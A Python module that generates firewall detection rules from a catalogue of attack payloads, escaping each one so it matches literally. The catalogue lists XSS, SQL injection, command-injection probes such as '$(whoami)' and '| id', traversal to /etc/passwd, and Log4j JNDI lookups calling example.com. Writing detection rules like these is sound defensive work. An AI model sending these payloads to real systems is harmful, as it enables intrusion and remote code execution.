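"""Generate WAF-style detection rules from a fixed catalogue of attack payloads.

Each payload becomes one rule whose ``pattern`` is a case-insensitive regex
that matches the payload *literally*: payloads are passed through
``re.escape`` so the metacharacters they contain (``|``, ``$``, ``(``, ``*``,
``.``) cannot widen the match.  Interpolating the raw payload into the regex
turns ``"| id"`` into an alternation with the empty string (matches every
request) and ``"SELECT * FROM"`` into "SELEC" followed by any number of
"T"s, so the generated rule either blocks all traffic or the wrong traffic.
"""
import json
import logging
import re

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Payload catalogue per vulnerability class.  Every string is matched as a
# literal substring (see generate_vulnerability_rules), so it must be the exact
# text the rule should fire on.  Empty entries are skipped at generation time
# because an empty pattern would match every request.
VULNERABILITY_PAYLOADS = {
    "xss": {
        "patterns": [
            "",
            "",
            "javascript:alert(1)",
            # base64 encoded script tag
            "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        ],
        "targets": ["ARGS", "BODY", "HEADERS"],
    },
    "sqli": {
        "patterns": [
            "1' OR '1'='1",
            "'; SELECT * FROM users;",
            '" OR "1"="1',
            "UNION SELECT 1,2,3;",
        ],
        "targets": ["ARGS", "BODY", "HEADERS"],
    },
    "rce": {
        "patterns": [
            "`whoami`",
            "$(whoami)",
            "; ls -la;",
            "| id",
        ],
        "targets": ["ARGS", "HEADERS"],
    },
    "lfi": {
        "patterns": [
            "../etc/passwd",
            "../../../../etc/passwd",
        ],
        "targets": ["URI"],
    },
    "log4j": {
        "patterns": [
            "${jndi:ldap://example.com/a}",
            "${jndi:rmi://example.com/b}",
            "${jndi:dns://example.com/c}",
        ],
        "targets": ["ARGS", "BODY", "HEADERS"],
    },
}


def _build_rule(rule_id, vuln_type, pattern, targets):
    """Return one rule dict whose regex matches *pattern* literally and case-insensitively.

    Args:
        rule_id: unique id string for the rule.
        vuln_type: vulnerability class name, used in the description.
        pattern: the raw payload text; escaped before being placed in the regex.
        targets: request parts the rule inspects; copied so rules do not share a list.
    """
    return {
        "id": rule_id,
        "phase": 2,
        # re.escape guarantees the payload is matched verbatim; without it a
        # payload such as "| id" becomes a regex alternation that matches "".
        "pattern": f"(?i){re.escape(pattern)}",
        "targets": list(targets),
        "severity": "HIGH",
        "action": "block",
        "score": 7,
        # The description keeps the human-readable, unescaped payload.
        "description": f"Detects {vuln_type} attack payload: {pattern}",
    }


def generate_vulnerability_rules(output_path, payloads=None):
    """Generate rules from the payload catalogue and write them to *output_path* as JSON.

    Args:
        output_path: destination file path; an existing file is overwritten.
        payloads: optional catalogue shaped like VULNERABILITY_PAYLOADS
            (``{vuln_type: {"patterns": [...], "targets": [...]}}``);
            defaults to the module constant.

    Returns:
        The list of rule dicts that was written, in generation order.  Rule ids
        are ``"<vuln_type>-<n>"`` with one counter shared across all classes.

    Raises:
        OSError: if *output_path* cannot be written.
    """
    if payloads is None:
        payloads = VULNERABILITY_PAYLOADS
    all_rules = []
    for vuln_type, data in payloads.items():
        for pattern in data["patterns"]:
            if not pattern:
                # An empty regex body matches every input: such a rule would
                # block all traffic rather than detect anything.
                logging.warning("Skipping empty %s payload: it would match every request", vuln_type)
                continue
            # len(all_rules) doubles as the global rule counter.
            rule_id = f"{vuln_type}-{len(all_rules)}"
            all_rules.append(_build_rule(rule_id, vuln_type, pattern, data["targets"]))
    logging.info("Generated %d rules from vulnerability payloads.", len(all_rules))
    with open(output_path, 'w', encoding='utf-8') as f:
        json.dump(all_rules, f, indent=2)
    logging.info("Saved %d rules to %s", len(all_rules), output_path)
    return all_rules


if __name__ == "__main__":
    output_path = "vulnerability_rules.json"
    generate_vulnerability_rules(output_path)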